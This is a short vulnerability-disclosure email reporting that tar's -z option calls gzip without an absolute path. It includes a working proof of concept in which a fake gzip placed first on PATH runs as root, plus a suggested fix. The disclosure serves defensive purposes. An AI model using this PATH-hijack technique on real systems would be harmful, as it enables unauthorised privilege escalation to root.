Path Hijack vulnerability

From: Gregorio Giacobbe
Subject: Path Hijack vulnerability
Date: Wed, 3 Nov 2021 15:21:43 +0100


As per subject, I discovered a Path Hijack vulnerability in the tar binary. When 
using the -z switch for gzip compression/decompression the binary calls "gzip" 
without an absolute path, hence allowing the Path Hijack. 
While this, in a normal scenario, can be totally harmless, it can be used as a 
privilege escalation technique when the tar binary is called as the root user.

The following lines provide a basic PoC:
export PATH=$(pwd):$PATH
echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
chmod +x gzip
touch file.txt
tar -zcf backup.tar.gz file.txt
ls -la /tmp/tarred 
-rw-r--r-- 1 root root 0 Nov  3 14:05 /tmp/tarred

I have not tested switches for other compression/decompression formats, so 
there is a chance that they can be used as well as gzip.

The remediation would be to make sure that tar calls gzip by its absolute path.

Best Regards, 
Gregorio Giacobbe

